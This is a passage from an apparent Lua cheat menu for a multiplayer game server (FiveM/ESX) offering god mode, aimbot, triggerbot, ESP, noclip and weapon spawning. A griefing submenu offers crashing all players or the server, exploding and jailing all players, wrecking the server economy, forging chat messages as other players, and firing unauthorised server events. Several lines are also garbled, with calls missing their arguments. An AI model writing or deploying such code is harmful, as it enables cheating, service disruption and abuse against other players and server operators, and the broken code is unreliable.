  6326. TiagoMenu.CheckBox(
  6327. "~h~~g~God ~h~~r~Mode ~s~1",
  6328. Godmode,
  6329. function(enabled)
  6330. Godmode = enabled
  6331. end)
  6332. then
  6333. elseif
  6334. TiagoMenu.CheckBox(
  6335. "~h~~g~God ~h~~r~Mode ~s~2",
  6336. ToggleGodmode,
  6337. function(enabled)
  6338. ToggleGodmode = enabled
  6339. end)
  6340. then
  6341. elseif
  6342. TiagoMenu.CheckBox(
  6343. "~h~~g~God ~h~~r~Mode ~s~3",
  6344. Demigod,
  6345. function(enabled)
  6346. Demigod = enabled
  6347. end)
  6348. then
  6349. elseif
  6350. TiagoMenu.CheckBox(
  6351. "~h~~b~Forcefield ~r~(~s~Turn on Godmode~r~)",
  6352. Forcefield,
  6353. function(enabled)
  6354. Forcefield = enabled
  6355. end)
  6356. then
  6357. elseif TiagoMenu.ComboBox("Radius ~b~Distance", ForcefieldRadiusOps, currForcefieldRadiusIndex, selForcefieldRadiusIndex, function(currentIndex, selectedIndex)
  6358. currForcefieldRadiusIndex = currentIndex
  6359. selForcefieldRadiusIndex = currentIndex
  6360. ForcefieldRadius = ForcefieldRadiusOps[currentIndex]
  6361. end) then
  6362. elseif TiagoMenu.Button("~h~~r~Suicide") then
  6363. SetEntityHealth(PlayerPedId(), 0)
  6364. elseif TiagoMenu.Button("~h~~g~Revive") then
  6365. TriggerEvent("esx_ambulancejob:revive")
  6366. TriggerEvent('ambulancier:selfRespawn')
  6367. elseif TiagoMenu.Button("~g~Heal") then
  6368. SetEntityHealth(PlayerPedId(), 200)
  6369. elseif TiagoMenu.Button("~h~~b~Armour") then
  6370. SetPedArmour(PlayerPedId(), 200)
  6371. elseif TiagoMenu.Button("~o~~h~Set hunger to ~s~100%") then
  6372. TriggerEvent("esx_status:set", "hunger", 1000000)
  6373. elseif TiagoMenu.Button("~b~~h~Set thirst to ~s~100%") then
  6374. TriggerEvent("esx_status:set", "thirst", 1000000)
  6375. elseif TiagoMenu.Button("~h~Open Menu Jail ~g~ESX") then
  6376. TriggerEvent("esx-qalle-jail:openJailMenu")
  6377. elseif TiagoMenu.Button("~h~~b~Unjail") then
  6378. TriggerServerEvent('esx_jailer:unjailTime', -1)
  6379. TriggerServerEvent('JailUpdate', 0)
  6380. TriggerEvent('UnJP')
  6381. elseif TiagoMenu.Button("~b~Cuff ~s~Player") then
  6382. TriggerServerEvent("OG_cuffs:cuffCheckNearest")
  6383. TriggerServerEvent("CheckHandcuff")
  6384. TriggerServerEvent('cuffServer')
  6385. TriggerServerEvent("cuffGranted")
  6386. TriggerServerEvent("police:cuffGranted")
  6387. TriggerServerEvent('esx_handcuffs:cuffing')
  6388. TriggerServerEvent('esx_policejob:handcuff')
  6389. elseif
  6390. TiagoMenu.CheckBox("~h~Infinite Stamina",InfStamina,function(enabled)InfStamina = enabled end)
  6391. then
  6392. elseif
  6393. TiagoMenu.CheckBox(
  6394. "~h~Super Jump",
  6395. SuperJump,
  6396. function(enabled)
  6397. SuperJump = enabled
  6398. end)
  6399. then
  6400. elseif
  6401. TiagoMenu.CheckBox(
  6402. "~h~Explosive Punch",
  6403. ePunch,
  6404. function(enabled)
  6405. ePunch = enabled
  6406. end)
  6407. then
  6408. elseif
  6409. TiagoMenu.CheckBox("~h~Fast Run",fastrun,function(enabled)fastrun = enabled end)
  6410. then
  6411. elseif
  6412. TiagoMenu.CheckBox(
  6413. "~h~Invisible",
  6414. Invisible,
  6415. function(enabled)
  6416. Invisible = enabled
  6417. end)
  6418. then
  6419. elseif
  6420. TiagoMenu.CheckBox("~h~NoClip",Noclip,function(enabled)Noclip = enabled end)
  6421. then
  6422. end
  6424. TiagoMenu.Display()
  6425. elseif TiagoMenu.IsMenuOpened("TeleportMenu") then
  6426. if TiagoMenu.Button("~h~Teleport ~h~~p~Waypoint ~r~(F5)") then
  6427. TeleportToWaypoint()
  6428. elseif TiagoMenu.Button("~h~Teleport intro ~h~~p~Vehicle ") then
  6430. local playerPed = GetPlayerPed(-1)
  6431. local playerPedPos = GetEntityCoords(playerPed, true)
  6432. local NearestVehicle = GetClosestVehicle(GetEntityCoords(playerPed, true), 1000.0, 0, 4)
  6433. local NearestVehiclePos = GetEntityCoords(NearestVehicle, true)
  6434. local NearestPlane = GetClosestVehicle(GetEntityCoords(playerPed, true), 1000.0, 0, 16384)
  6435. local NearestPlanePos = GetEntityCoords(NearestPlane, true)
  6437. Citizen.Wait(1000)
  6438. if (NearestVehicle == 0) and (NearestPlane == 0) then
  6439. drawNotification("~r~No Vehicle Found")
  6440. elseif (NearestVehicle == 0) and (NearestPlane ~= 0) then
  6441. if IsVehicleSeatFree(NearestPlane, -1) then
  6442. SetPedIntoVehicle(playerPed, NearestPlane, -1)
  6443. SetVehicleAlarm(NearestPlane, false)
  6444. SetVehicleDoorsLocked(NearestPlane, 1)
  6445. SetVehicleNeedsToBeHotwired(NearestPlane, false)
  6446. else
  6447. local driverPed = GetPedInVehicleSeat(NearestPlane, -1)
  6448. ClearPedTasksImmediately(driverPed)
  6449. SetEntityAsMissionEntity(driverPed, 1, 1)
  6450. DeleteEntity(driverPed)
  6451. SetPedIntoVehicle(playerPed, NearestPlane, -1)
  6452. SetVehicleAlarm(NearestPlane, false)
  6453. SetVehicleDoorsLocked(NearestPlane, 1)
  6454. SetVehicleNeedsToBeHotwired(NearestPlane, false)
  6455. end
  6456. drawNotification("~g~Teleported Into Vehicle")
  6457. elseif (NearestVehicle ~= 0) and (NearestPlane == 0) then
  6458. if IsVehicleSeatFree(NearestVehicle, -1) then
  6459. SetPedIntoVehicle(playerPed, NearestVehicle, -1)
  6460. SetVehicleAlarm(NearestVehicle, false)
  6461. SetVehicleDoorsLocked(NearestVehicle, 1)
  6462. SetVehicleNeedsToBeHotwired(NearestVehicle, false)
  6463. else
  6464. local driverPed = GetPedInVehicleSeat(NearestVehicle, -1)
  6465. ClearPedTasksImmediately(driverPed)
  6466. SetEntityAsMissionEntity(driverPed, 1, 1)
  6467. DeleteEntity(driverPed)
  6468. SetPedIntoVehicle(playerPed, NearestVehicle, -1)
  6469. SetVehicleAlarm(NearestVehicle, false)
  6470. SetVehicleDoorsLocked(NearestVehicle, 1)
  6471. SetVehicleNeedsToBeHotwired(NearestVehicle, false)
  6472. end
  6473. drawNotification("~g~Teleported Into Vehicle")
  6474. elseif (NearestVehicle ~= 0) and (NearestPlane ~= 0) then
  6475. if Vdist(NearestVehiclePos.x, NearestVehiclePos.y, NearestVehiclePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) < Vdist(NearestPlanePos.x, NearestPlanePos.y, NearestPlanePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) then
  6476. if IsVehicleSeatFree(NearestVehicle, -1) then
  6477. SetPedIntoVehicle(playerPed, NearestVehicle, -1)
  6478. SetVehicleAlarm(NearestVehicle, false)
  6479. SetVehicleDoorsLocked(NearestVehicle, 1)
  6480. SetVehicleNeedsToBeHotwired(NearestVehicle, false)
  6481. else
  6482. local driverPed = GetPedInVehicleSeat(NearestVehicle, -1)
  6483. ClearPedTasksImmediately(driverPed)
  6484. SetEntityAsMissionEntity(driverPed, 1, 1)
  6485. DeleteEntity(driverPed)
  6486. SetPedIntoVehicle(playerPed, NearestVehicle, -1)
  6487. SetVehicleAlarm(NearestVehicle, false)
  6488. SetVehicleDoorsLocked(NearestVehicle, 1)
  6489. SetVehicleNeedsToBeHotwired(NearestVehicle, false)
  6490. end
  6491. elseif Vdist(NearestVehiclePos.x, NearestVehiclePos.y, NearestVehiclePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) > Vdist(NearestPlanePos.x, NearestPlanePos.y, NearestPlanePos.z, playerPedPos.x, playerPedPos.y, playerPedPos.z) then
  6492. if IsVehicleSeatFree(NearestPlane, -1) then
  6493. SetPedIntoVehicle(playerPed, NearestPlane, -1)
  6494. SetVehicleAlarm(NearestPlane, false)
  6495. SetVehicleDoorsLocked(NearestPlane, 1)
  6496. SetVehicleNeedsToBeHotwired(NearestPlane, false)
  6497. else
  6498. local driverPed = GetPedInVehicleSeat(NearestPlane, -1)
  6499. ClearPedTasksImmediately(driverPed)
  6500. SetEntityAsMissionEntity(driverPed, 1, 1)
  6501. DeleteEntity(driverPed)
  6502. SetPedIntoVehicle(playerPed, NearestPlane, -1)
  6503. SetVehicleAlarm(NearestPlane, false)
  6504. SetVehicleDoorsLocked(NearestPlane, 1)
  6505. SetVehicleNeedsToBeHotwired(NearestPlane, false)
  6506. end
  6507. end
  6508. drawNotification("~g~Teleported Into Vehicle")
  6509. end
  6510. elseif TiagoMenu.Button("~h~Teleport ~p~To Coords") then
  6511. TeleportToCoords()
  6512. elseif TiagoMenu.Button("~h~Teleport ~h~~g~LSPD ") then
  6513. LSPD()
  6514. elseif TiagoMenu.Button('~h~Teleport ~h~~g~FBI') then
  6515. fbi()
  6516. elseif TiagoMenu.Button('~h~Teleport ~h~~g~LS Customs') then
  6517. ls()
  6518. elseif TiagoMenu.Button('~h~Teleport ~h~~g~GP') then
  6519. gp()
  6520. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Ammunation') then
  6521. Ammunation()
  6522. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Clothes shop') then
  6523. shopclothes()
  6524. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Barber') then
  6525. barber()
  6526. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Maze Bank') then
  6527. MazeBank()
  6528. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Spot') then
  6529. spot()
  6530. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Michael House') then
  6531. MichaelHouse()
  6532. elseif TiagoMenu.Button('~h~Teleport ~h~~g~Trevor Trailer') then
  6533. trevor()
  6535. end
  6537. TiagoMenu.Display()
  6538. elseif TiagoMenu.IsMenuOpened("World") then
  6539. if
  6540. TiagoMenu.CheckBox(
  6541. "~h~ESP",
  6542. esp,
  6543. function(enabled)
  6544. esp = enabled
  6545. end)
  6546. then
  6547. elseif
  6548. TiagoMenu.CheckBox(
  6549. "~h~Collision vehicles",
  6550. Collision,
  6551. function(enabled)
  6552. Collision = enabled
  6553. end)
  6554. then
  6555. elseif
  6556. TiagoMenu.CheckBox(
  6557. "~h~Force MiniMap",
  6558. ForceMap,
  6559. function(enabled)
  6560. ForceMap = enabled
  6561. end)
  6562. then
  6563. elseif
  6564. TiagoMenu.CheckBox(
  6565. "~h~Players Blips Map",
  6566. playerBlips,
  6567. function(enabled)
  6568. playerBlips = enabled
  6569. end)
  6570. then
  6571. elseif TiagoMenu.CheckBox(
  6572. "~h~~r~Crosshair",
  6573. crosshair,
  6574. function(enabled)
  6575. crosshair = enabled
  6576. end)
  6577. then
  6578. elseif TiagoMenu.CheckBox(
  6579. "~h~~r~Crosshair 2",
  6580. crosshair2,
  6581. function(enabled)
  6582. crosshair2 = enabled
  6583. end)
  6584. then
  6585. elseif TiagoMenu.CheckBox(
  6586. "~h~~r~Crosshair 3",
  6587. crosshair3,
  6588. function(enabled)
  6589. crosshair3 = enabled
  6590. end)
  6591. then
  6592. elseif TiagoMenu.CheckBox(
  6593. "~h~~o~Thermal Vision",
  6594. thermalVision,
  6595. function(enabled)
  6596. thermalVision = enabled
  6597. SetSeethrough(thermalVision)
  6598. end)
  6599. then
  6600. elseif TiagoMenu.CheckBox(
  6601. "~p~Night Vision",
  6602. nightVision,
  6603. function(enabled)
  6604. nightVision = enabled
  6605. SetNightvision(nightVision)
  6606. end)
  6607. then
  6608. elseif TiagoMenu.CheckBox(
  6609. "~h~Christmas Weather",
  6610. XMAS,
  6611. function(enabled)
  6612. XMAS = enabled
  6613. end)
  6614. then
  6615. elseif TiagoMenu.CheckBox(
  6616. "~o~Foggy Weather",
  6617. FOGGY,
  6618. function(enabled)
  6619. FOGGY = enabled
  6620. end)
  6621. then
  6622. elseif TiagoMenu.CheckBox(
  6623. "~h~Clear Weather",
  6624. CLEAR,
  6625. function(enabled)
  6626. CLEAR = enabled
  6627. end)
  6628. then
  6629. elseif TiagoMenu.CheckBox(
  6630. "~g~Blizzard Weather",
  6631. BLIZZARD,
  6632. function(enabled)
  6633. BLIZZARD = enabled
  6634. end)
  6635. then
  6636. elseif TiagoMenu.CheckBox(
  6637. "~y~Extra Sunny Weather",
  6639. function(enabled)
  6640. EXTRASUNNY = enabled
  6641. end)
  6642. then
  6643. elseif TiagoMenu.Button("Time set to night") then
  6644. NetworkOverrideClockTime(23, 50, 0)
  6645. elseif TiagoMenu.Button("Time set to day") then
  6646. NetworkOverrideClockTime(12, 12, 0)
  6647. end
  6649. TiagoMenu.Display()
  6650. elseif TiagoMenu.IsMenuOpened("Fuck") then
  6651. if TiagoMenu.Button("~h~~r~Give All Weapons ~s~~h~Players") then
  6652. for ids = 0, 128 do
  6653. if ids ~= PlayerId() and GetPlayerServerId(ids) ~= 0 then
  6654. for i = 1, #allWeapons do
  6655. GiveWeaponToPed(PlayerPedId(ids), GetHashKey(allWeapons[i]), 1000, false, false)
  6656. end
  6657. end
  6658. end
  6659. elseif TiagoMenu.Button("~h~~r~Remove All Weapons ~s~~h~Players") then
  6660. for ids = 0, 128 do
  6661. if ids ~= PlayerId() and GetPlayerServerId(ids) ~= 0 then
  6662. for i = 1, #allWeapons do
  6663. RemoveAllPedWeapons(PlayerPedId(ids), true)
  6664. end
  6665. end
  6666. end
  6667. elseif TiagoMenu.Button("Set All Nearby Vehicles Plate Text") then
  6668. local plateInput = KeyboardInput("Enter Plate Text (8 Characters):" , "", 100000000)
  6669. for k in EnumerateVehicles() do
  6670. RequestControlOnce(k)
  6671. SetVehicleNumberPlateText(k, plateInput)
  6672. end
  6673. elseif TiagoMenu.Button("~r~Close ~s~the whole square ~y~NEW") then
  6674. x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(SelectedPlayer)))
  6675. roundx = tonumber(string.format('%.2f', x))
  6676. roundy = tonumber(string.format('%.2f', y))
  6677. roundz = tonumber(string.format('%.2f', z))
  6678. local e8 = -145066854
  6679. RequestModel(e8)
  6680. while not HasModelLoaded(e8) do
  6681. Citizen.Wait(0)
  6682. end
  6683. local e9 = CreateObject(e8, 258.91, -933.1, 26.21, true, true, false)
  6684. local ea = CreateObject(e8, 200.91, -874.1, 26.21, true, true, false)
  6685. local e92 = CreateObject(e8, 126.52, -933.2, 26.21, true, true, false)
  6686. local ea2 = CreateObject(e8, 184.52, -991.2, 26.21, true, true, false)
  6687. SetEntityHeading(e9, 158.41)
  6688. SetEntityHeading(ea, 90.51)
  6689. SetEntityHeading(e92, 332.41)
  6690. SetEntityHeading(ea2, 260.51)
  6691. FreezeEntityPosition(e9, true)
  6692. FreezeEntityPosition(ea, true)
  6693. FreezeEntityPosition(e92, true)
  6694. FreezeEntityPosition(ea2, true)
  6695. elseif TiagoMenu.Button("~h~~r~Fake ~h~~s~chat Message") then
  6696. local eX = KeyboardInput("Enter player name", "", 100) if eX then local dT = KeyboardInput("Enter message", "", 10000) if dT then TriggerServerEvent("adminmenu:allowall") TriggerServerEvent("_chat:messageEntered", eX, {0, 0x99, 255}, dT) end end
  6697. elseif
  6698. TiagoMenu.CheckBox(
  6699. "~h~~r~Spam ~h~~s~chat",
  6700. spam,
  6701. function(enabled)
  6702. spam = enabled
  6703. end)
  6704. then
  6705. elseif
  6706. TiagoMenu.CheckBox(
  6707. "~h~~r~Explode ~s~All Players",
  6708. blowall,
  6709. function(enabled)
  6710. blowall = enabled
  6711. end)
  6712. then
  6713. elseif
  6714. TiagoMenu.CheckBox(
  6715. "~h~~r~Crash ~s~All Players",
  6716. nuke,
  6717. function(enabled)
  6718. nuke = enabled
  6719. end)
  6720. then
  6721. elseif
  6722. TiagoMenu.CheckBox(
  6723. "~h~~r~Fuck ~s~Server economy ~g~ESX",
  6724. esxdestroy,
  6725. function(enabled)
  6726. esxdestroy = enabled
  6727. end)
  6728. then
  6729. elseif
  6730. TiagoMenu.CheckBox(
  6731. "~h~~r~Jail ~s~All Players",
  6732. banallusers,
  6733. function(enabled)
  6734. banallusers = enabled
  6735. end)
  6736. then
  6737. elseif
  6738. TiagoMenu.CheckBox(
  6739. "~h~~r~Cuff ~s~All Players",
  6740. freezeall,
  6741. function(enabled)
  6742. freezeall = enabled
  6743. end)
  6744. then
  6745. elseif
  6746. TiagoMenu.CheckBox(
  6747. "~h~~r~Crash ~s~Server",
  6748. servercrasher,
  6749. function(enabled)
  6750. servercrasher = enabled
  6751. end)
  6752. then
  6753. elseif TiagoMenu.Button("~h~~b~------Fuck all Vehicles------") then
  6754. elseif TiagoMenu.Button("~h~~r~Rampinator") then
  6755. for vehicle in EnumerateVehicles() do local eY = CreateObject(-145066854, 0, 0, 0, true, true, true) NetworkRequestControlOfEntity(vehicle) AttachEntityToEntity(eY, vehicle, 0, 0, -1.0, 0.0, 0.0, 0, true, true, false, true, 1, true) NetworkRequestControlOfEntity(eY) SetEntityAsMissionEntity(eY, true, true) end
  6756. elseif TiagoMenu.CheckBox("~h~~r~Delete~s~ Vehicles", deletenearestvehicle, function(eC) deletenearestvehicle = eC end) then
  6757. elseif TiagoMenu.Button("~h~~r~BORGAR~s~ Vehicles") then local cC = GetHashKey("xs_prop_hamburgher_wl") for vehicle in EnumerateVehicles() do local cD = CreateObject(cC, 0, 0, 0, true, true, true) AttachEntityToEntity(cD, vehicle, 0, 0, -1.0, 0.0, 0.0, 0, true, true, false, true, 1, true) end
  6758. elseif TiagoMenu.CheckBox("~h~~r~Explode~s~ Vehicles", explodevehicles, function(eC) explodevehicles = eC end) then
  6759. elseif TiagoMenu.CheckBox("~h~~r~Fuck~s~ Vehicles", fuckallcars, function(eC) fuckallcars = eC end) then end;
  6761. TiagoMenu.Display()
  6762. elseif TiagoMenu.IsMenuOpened("WepMenu") then
  6763. if TiagoMenu.MenuButton('~h~~r~→ ~y~Ammunition', 'WeaponTypes') then
  6764. elseif TiagoMenu.MenuButton("~h~All Weapon", "SingleWepMenu") then
  6765. elseif TiagoMenu.Button("~h~~g~Give ~s~~h~All Weapons") then
  6766. for i = 1, #allWeapons do
  6767. GiveWeaponToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 1000, false, false)
  6768. end
  6769. elseif TiagoMenu.Button("~h~~r~Remove ~s~~h~All Weapons") then
  6770. for i = 1, #allWeapons do
  6771. RemoveAllPedWeapons(PlayerPedId(), true)
  6772. end
  6773. elseif TiagoMenu.Button("~h~~b~Give Ammo") then
  6774. for i = 1, #allWeapons do
  6775. AddAmmoToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 200)
  6776. end
  6777. elseif
  6778. TiagoMenu.ComboBox(
  6779. "~h~Weapon/Melee Damage",
  6780. {"1x (Default)", "2x", "3x", "4x", "5x"},
  6781. currentItemIndex,
  6782. selectedItemIndex,
  6783. function(currentIndex, selectedIndex)
  6784. currentItemIndex = currentIndex
  6785. selectedItemIndex = selectedIndex
  6786. SetPlayerWeaponDamageModifier(PlayerId(), selectedItemIndex)
  6787. SetPlayerMeleeWeaponDamageModifier(PlayerId(), selectedItemIndex)
  6788. end
  6789. )
  6790. then
  6791. elseif TiagoMenu.CheckBox(
  6792. "~h~Explosive Ammo",
  6793. bifegfubffff,
  6794. function(enabled)
  6795. bifegfubffff = enabled
  6796. end)
  6797. then
  6798. elseif TiagoMenu.CheckBox(
  6799. "~h~No Reload",
  6800. dwadawdwd,
  6801. function(enabled)
  6802. dwadawdwd = enabled
  6803. SetPedInfiniteAmmoClip(PlayerPedId(), dwadawdwd)
  6804. end)
  6805. then
  6806. elseif TiagoMenu.CheckBox(
  6807. "~h~Oneshot",
  6808. Oneshot,
  6809. function(enabled)
  6810. Oneshot = enabled
  6811. end)
  6812. then
  6813. elseif
  6814. TiagoMenu.CheckBox(
  6815. "~h~TriggerBot",
  6816. TriggerBot,
  6817. function(enabled)
  6818. TriggerBot = enabled
  6819. end)
  6820. then
  6821. elseif
  6822. TiagoMenu.CheckBox(
  6823. "~h~AimBot",
  6824. AimBot,
  6825. function(enabled)
  6826. AimBot = enabled
  6827. end)
  6828. then
  6829. elseif
  6830. TiagoMenu.CheckBox(
  6831. "~h~ForceGun",
  6832. ForceGun,
  6833. function(enabled)
  6834. ForceGun = enabled
  6835. end)
  6836. then
  6837. elseif
  6838. TiagoMenu.CheckBox(
  6839. "~h~Infinite Ammo",
  6840. InfAmmo,
  6841. function(enabled)
  6842. InfAmmo = enabled
  6843. SetPedInfiniteAmmoClip(PlayerPedId(), InfAmmo)
  6844. end
  6845. )
  6846. then
  6847. elseif
  6848. TiagoMenu.CheckBox("~h~Vehicle Gun",VehicleGun,
  6849. function(enabled)VehicleGun = enabled end)
  6850. then
  6851. elseif
  6852. TiagoMenu.CheckBox("~h~Delete Gun",DeleteGun,
  6853. function(enabled)DeleteGun = enabled end)
  6854. then
  6855. end
  6857. TiagoMenu.Display()
  6858. elseif TiagoMenu.IsMenuOpened('WeaponTypes') then
  6859. for dp, dD in pairs(b0) do
  6860. if
  6861. TiagoMenu.MenuButton(
  6862. '~h~~y~> ~s~' .. dp,
  6863. 'WeaponTypeSelection'
  6864. )
  6865. then
  6866. d4 = dD
  6867. end
  6868. end
  6869. TiagoMenu.Display()
  6870. elseif TiagoMenu.IsMenuOpened('WeaponTypeSelection') then
  6871. for dp, dD in pairs(d4) do
  6872. if TiagoMenu.MenuButton(, 'WeaponOptions') then
  6873. d5 = dD
  6874. end
  6875. end
  6876. TiagoMenu.Display()
  6877. elseif TiagoMenu.IsMenuOpened('WeaponOptions') then
  6878. if TiagoMenu.Button('~h~~y~Spawn Weapon inventory') then
  6879. GiveWeaponToPed(GetPlayerPed(-1), GetHashKey(, 1000, false)
  6880. end
  6881. if TiagoMenu.Button('~h~+ ~g~Ammo') then
  6882. SetPedAmmo(GetPlayerPed(-1), GetHashKey(, 5000)
  6883. end
  6884. if
  6885. TiagoMenu.CheckBox(
  6886. '~h~~r~Infinite ~s~Ammo',
  6887. d5.bInfAmmo,
  6888. function(dE)
  6889. end
  6890. )
  6891. then
  6892. d5.bInfAmmo = not d5.bInfAmmo
  6893. SetPedInfiniteAmmo(GetPlayerPed(-1), d5.bInfAmmo, GetHashKey(
  6894. SetPedInfiniteAmmoClip(GetPlayerPed(-1), true)
  6895. end
  6896. for dp, dD in pairs(d5.mods) do
  6897. if TiagoMenu.MenuButton('~h~~r~> ~s~' .. dp, 'ModSelect') then
  6898. d6 = dD
  6899. end
  6900. end
  6901. TiagoMenu.Display()
  6902. elseif TiagoMenu.IsMenuOpened('ModSelect') then
  6903. for _, dD in pairs(d6) do
  6904. if TiagoMenu.Button( then
  6905. GiveWeaponComponentToPed(GetPlayerPed(-1), GetHashKey(, GetHashKey(
  6906. end
  6907. end
  6909. TiagoMenu.Display()
  6910. elseif TiagoMenu.IsMenuOpened("SingleWepMenu") then
  6911. for i = 1, #allWeapons do
  6912. if TiagoMenu.Button(allWeapons[i]) then
  6913. GiveWeaponToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 1000, false, false)
  6914. end
  6915. end
  6918. TiagoMenu.Display()
  6919. elseif TiagoMenu.IsMenuOpened("VehMenu") then
  6920. if TiagoMenu.Button("~r~→ ~s~Vehicles ~y~Name") then
  6921. local ModelName = KeyboardInput("Enter Vehicle Spawn Name", "", 100)
  6922. if ModelName and IsModelValid(ModelName) and IsModelAVehicle(ModelName) then
  6923. RequestModel(ModelName)
  6924. while not HasModelLoaded(ModelName) do
  6925. Citizen.Wait(0)
  6926. end
  6928. local veh = CreateVehicle(GetHashKey(ModelName), GetEntityCoords(PlayerPedId()), GetEntityHeading(PlayerPedId()), true, true)
  6930. SetPedIntoVehicle(PlayerPedId(), veh, -1)
  6931. else
  6932. drawNotification("~r~~h~Model is not valid!")
  6933. end
  6934. elseif TiagoMenu.IsMenuOpened('compacts') then
  6935. for i=1, #compacts do
  6936. if TiagoMenu.Button(compacts[i]) then
  6937. SpawnVeh(compacts[i], PlaceSelf)
  6938. end
  6939. end
  6940. elseif TiagoMenu.MenuButton('~r~→ ~s~Vehicles ~r~List', 'CarTypes') then
  6941. elseif TiagoMenu.MenuButton('~r~→ ~o~LSC ~s~Customs', 'LSC') then
  6942. elseif TiagoMenu.MenuButton("~r~→ ~s~Vehicle Boost", "VehBoostMenu") then
  6943. elseif TiagoMenu.Button("~h~~g~Repair Vehicle") then
  6944. SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(-1), false))
  6945. SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0.0)
  6946. SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  6947. SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  6948. Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  6949. elseif TiagoMenu.Button("~h~Max ~b~Exterior Tuning") then
  6950. MaxOut(GetVehiclePedIsUsing(PlayerPedId())
  6951. ) elseif TiagoMenu.Button("~h~Max ~b~Performance") then
  6952. engine(GetVehiclePedIsUsing(PlayerPedId()))
  6953. elseif TiagoMenu.Button("~h~Max All ~b~Tuning") then
  6954. engine1(GetVehiclePedIsUsing(PlayerPedId()))
  6955. elseif
  6956. TiagoMenu.CheckBox(
  6957. "~h~Rainbow Vehicle Colour",
  6958. RainbowVeh,
  6959. function(enabled)
  6960. RainbowVeh = enabled
  6961. end)
  6962. then
  6963. elseif TiagoMenu.Button("~h~~b~Change License Plate") then
  6964. local playerPed = GetPlayerPed(-1)
  6965. local playerVeh = GetVehiclePedIsIn(playerPed, true)
  6966. local result = KeyboardInput("Enter the plate license you want", "", 10)
  6967. if result then
  6968. SetVehicleNumberPlateText(playerVeh, result)
  6969. end
  6970. elseif TiagoMenu.Button("~h~~r~Delete Vehicle") then
  6971. DelVeh(GetVehiclePedIsUsing(PlayerPedId()))
  6972. drawNotification("Vehicle Deleted")
  6973. elseif TiagoMenu.Button("~h~Make vehicle dirty") then
  6974. Clean(GetVehiclePedIsUsing(PlayerPedId()))
  6975. drawNotification("Vehicle is now dirty")
  6976. elseif TiagoMenu.Button("~h~Make vehicle clean") then
  6977. Clean2(GetVehiclePedIsUsing(PlayerPedId()))
  6978. drawNotification("Vehicle is now clean")
  6979. elseif
  6980. TiagoMenu.CheckBox(
  6981. "~h~No Fall",
  6982. Nofall,
  6983. function(enabled)
  6984. Nofall = enabled
  6986. SetPedCanBeKnockedOffVehicle(PlayerPedId(), Nofall)
  6987. end
  6988. )
  6989. then
  6990. elseif
  6991. TiagoMenu.CheckBox(
  6992. "~h~Vehicle Godmode",
  6993. VehGod,
  6994. function(enabled)
  6995. VehGod = enabled
  6996. end
  6997. )
  6998. then
  6999. elseif
  7000. TiagoMenu.CheckBox(
  7001. "~h~Vehicle Speedboost ~g~Num9",
  7002. VehSpeed,
  7003. function(enabled)
  7004. VehSpeed = enabled
  7005. end)
  7006. then
  7007. elseif TiagoMenu.CheckBox(
  7008. "Super Handling",
  7009. superGrip,
  7010. function(enabled)
  7011. superGrip = enabled
  7012. enchancedGrip = false
  7013. driftMode = false
  7014. fdMode = false
  7015. end)
  7016. then
  7017. elseif TiagoMenu.CheckBox(
  7018. "Enhanced Grip",
  7019. enchancedGrip,
  7020. function(enabled)
  7021. superGrip = false
  7022. enchancedGrip = enabled
  7023. driftMode = false
  7024. fdMode = false
  7025. end)
  7026. then
  7027. elseif TiagoMenu.CheckBox(
  7028. "Drift Mode",
  7029. driftMode,
  7030. function(enabled)
  7031. superGrip = false
  7032. enchancedGrip = false
  7033. driftMode = enabled
  7034. fdMode = false
  7035. end)
  7036. then
  7037. elseif TiagoMenu.CheckBox(
  7038. "Formula Drift Mode",
  7039. fdMode,
  7040. function(enabled)
  7041. superGrip = false
  7042. enchancedGrip = false
  7043. driftMode = false
  7044. fdMode = enabled
  7045. end)
  7046. then
  7047. elseif
  7048. TiagoMenu.CheckBox(
  7049. "~h~Super Grip",
  7050. supergrip,
  7051. function(enabled)
  7052. supergrip = enabled
  7053. end
  7054. )
  7055. then
  7056. end
  7057. TiagoMenu.Display()
  7058. elseif TiagoMenu.IsMenuOpened('tunings') then
  7059. veh = GetVehiclePedIsUsing(PlayerPedId())
  7060. for i, da in pairs(be) do
  7061. if == 'extra' and #checkValidVehicleExtras() ~= 0 then
  7062. if TiagoMenu.MenuButton(, then
  7063. end
  7064. elseif == 'neon' then
  7065. if TiagoMenu.MenuButton(, then
  7066. end
  7067. elseif == 'paint' then
  7068. if TiagoMenu.MenuButton(, then
  7069. end
  7070. elseif == 'wheeltypes' then
  7071. if TiagoMenu.MenuButton(, then
  7072. end
  7073. else
  7074. local at = checkValidVehicleMods(
  7075. for dg, dh in pairs(at) do
  7076. if TiagoMenu.MenuButton(, then
  7077. end
  7078. break
  7079. end
  7080. end
  7081. end
  7082. if IsToggleModOn(veh, 22) then
  7083. xenonStatus = 'Installed'
  7084. else
  7085. xenonStatus = 'Not Installed'
  7086. end
  7087. if TiagoMenu.Button('Xenon Headlight', xenonStatus) then
  7088. if not IsToggleModOn(veh, 22) then
  7089. ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
  7090. else
  7091. ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
  7092. end
  7093. end
  7094. TiagoMenu.Display()
  7095. elseif TiagoMenu.IsMenuOpened('performance') then
  7096. veh = GetVehiclePedIsUsing(PlayerPedId())
  7097. for i, da in pairs(bf) do
  7098. if TiagoMenu.MenuButton(, then
  7099. end
  7100. end
  7101. if IsToggleModOn(veh, 18) then
  7102. turboStatus = 'Installed'
  7103. else
  7104. turboStatus = 'Not Installed'
  7105. end
  7106. if TiagoMenu.Button('~h~~b~Turbo ~h~Tune', turboStatus) then
